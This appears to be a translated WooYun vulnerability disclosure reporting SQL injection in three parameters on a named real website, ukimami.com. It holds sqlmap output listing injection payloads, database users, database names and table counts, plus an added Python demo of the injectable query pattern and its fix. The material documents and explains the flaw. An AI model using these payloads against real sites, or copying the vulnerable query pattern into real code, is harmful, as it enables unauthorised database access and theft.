WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------------------------- http://drop.zone.ci/
2015-11-08: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed.
2015-12-23: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
A website belonging to 十月妈咪 again has SQL injection in several parameters, and the ajax interface file is injectable as well. The site does not seem to get much traffic!~~~
http://www.ukimami.com/classroom-uki.php?page=21&item=15  (parameter item is injectable)
http://www.ukimami.com/product.php?m=product_list&category=10  (parameter category is injectable)
www.ukimami.com/ajax_product.php?tid=364|10&time=0.7562016532756388  (parameter tid is injectable)
[*] starting at 21:33:33

[21:33:33] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: item
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=21&item=15 AND 4670=4670

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: page=21&item=15 AND (SELECT 4333 FROM(SELECT COUNT(*),CONCAT(0x7164756171,(SELECT (CASE WHEN (4333=4333) THEN 1 ELSE 0 END)),0x7164667971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page=21&item=15 AND SLEEP(5)
---
[21:33:33] [INFO] testing MySQL
[21:33:33] [WARNING] reflective value(s) found and filtering out
[21:33:33] [INFO] confirming MySQL
[21:33:33] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL >= 5.0.0
[21:33:33] [INFO] fetching current user
[21:33:34] [INFO] retrieved: oct_crop@%
current user: 'oct_crop@%'
[21:33:34] [INFO] fetching current database
[21:33:34] [INFO] retrieved: youxi
current database: 'youxi'
[21:33:34] [INFO] testing if current user is DBA
[21:33:34] [INFO] fetching current user
current user is DBA: True
database management system users [7]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'oct_crop'@'%'
[*] 'oct_crop'@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'

[21:37:33] [INFO] fetching database names
[21:37:33] [INFO] the SQL query used returns 7 entries
[21:37:33] [INFO] retrieved: information_schema
[21:37:33] [INFO] retrieved: mysql
[21:37:33] [INFO] retrieved: octmami
[21:37:34] [INFO] retrieved: performance_schema
[21:37:34] [INFO] retrieved: phpmyadmin
[21:37:34] [INFO] retrieved: test
[21:37:34] [INFO] retrieved: youxi
available databases [7]:
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] phpmyadmin
[*] test
[*] youxi

Database: youxi
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| _bak_oc_shop           | 408     |
| oc_shop                | 404     |
| oc_yproduct            | 403     |
| oc_present_exchange    | 309     |
| oc_product             | 265     |
| oc_yshop               | 94      |
| oc_wiki_info           | 61      |
| oc_product_property    | 59      |
| oc_present_gallery     | 52      |
| oc_module              | 51      |
| oc_jobs                | 37      |
| oc_news                | 34      |
| oc_milestone           | 21      |
| oc_wiki_sort           | 20      |
| oc_dee                 | 17      |
| oc_present             | 17      |
| oc_bbs                 | 15      |
| oc_member              | 15      |
| oc_video               | 10      |
| oc_index_ad            | 7       |
| oc_join_ab             | 7       |
| oc_lost_card           | 7       |
| oc_product_sort        | 7       |
| oc_yproduct_sort       | 5       |
| oc_admin_user          | 4       |
| oc_uindex_ad           | 3       |
| oc_join_table          | 2       |
| oc_sessions            | 2       |
| oc_contact_us          | 1       |
| oc_sessions_data       | 1       |
| oc_yproduct_property   | 1       |
+------------------------+---------+
The connection is still intermittent, connecting and dropping by turns, so I did not go any further!~~~
As above.
Filter and validate the parameters (item, category, tid) before they reach the SQL query.
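To show why the three parameters above are exploitable and what the suggested filtering fix looks like in practice, here is an added example that is not code from the original report or from the ukimami.com site. It runs in Python against an in-memory SQLite table with constructed sample rows; the table name oc_product is taken from the listing above, but its columns (category, item, name) are assumed. The boolean-based blind probe mirrors sqlmap's "item=15 AND 4670=4670" payload; the MySQL-specific error-based and SLEEP() payloads are not reproduced because SQLite lacks those functions.

```python
import re
import sqlite3

# Constructed sample rows standing in for the site's data (not real data).
SAMPLE_ROWS = [
    (10, 15, "item-15"),
    (10, 16, "item-16"),
    (11, 17, "item-17"),
]


def make_db():
    """Build an in-memory table that plays the role of oc_product (columns assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE oc_product (category INTEGER, item INTEGER, name TEXT)")
    conn.executemany("INSERT INTO oc_product VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, item):
    """Vulnerable pattern: the raw request parameter is spliced into the SQL text."""
    sql = "SELECT name FROM oc_product WHERE item = " + item
    return [row[0] for row in conn.execute(sql)]


def blind_probe(conn, lookup, item, condition):
    """Boolean-based blind check: append 'AND <condition>' and see whether the result changes.

    With lookup_vulnerable, a true condition returns the normal row and a false one
    returns nothing, which is exactly the signal sqlmap's boolean-based test relies on.
    """
    return lookup(conn, f"{item} AND {condition}")


def is_valid_id(value):
    """Whitelist check for item/category: a short decimal integer and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def lookup_fixed(conn, item):
    """Fixed pattern: reject anything but an integer, then bind it as a parameter."""
    if not is_valid_id(item):
        raise ValueError("item must be a decimal integer")
    sql = "SELECT name FROM oc_product WHERE item = ?"
    return [row[0] for row in conn.execute(sql, (int(item),))]


def parse_tid(tid):
    """ajax_product.php took tid=364|10; accept only two integers joined by a pipe.

    Returns (364, 10) for valid input and None for anything else, so the caller
    can refuse the request before building a query.
    """
    match = re.fullmatch(r"([0-9]{1,10})\|([0-9]{1,10})", tid)
    if match is None:
        return None
    return int(match.group(1)), int(match.group(2))


if __name__ == "__main__":
    db = make_db()
    print("normal:", lookup_vulnerable(db, "15"))
    print("true condition:", blind_probe(db, lookup_vulnerable, "15", "4670=4670"))
    print("false condition:", blind_probe(db, lookup_vulnerable, "15", "4670=4671"))
    print("fixed lookup:", lookup_fixed(db, "15"))
    print("tid 364|10 ->", parse_tid("364|10"), "; tid with payload ->", parse_tid("364|10 AND 1=1"))
```

The two probe calls are the whole story of a boolean-based blind injection: the attacker never sees query output, only whether the page still contains "item-15". The fix does not try to strip quotes or keywords (the payload above contains neither); it refuses any value that is not the integer the parameter is supposed to be and binds it with a placeholder, so the database never parses attacker-controlled text as SQL.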
Unable to contact the vendor, or the vendor actively declined.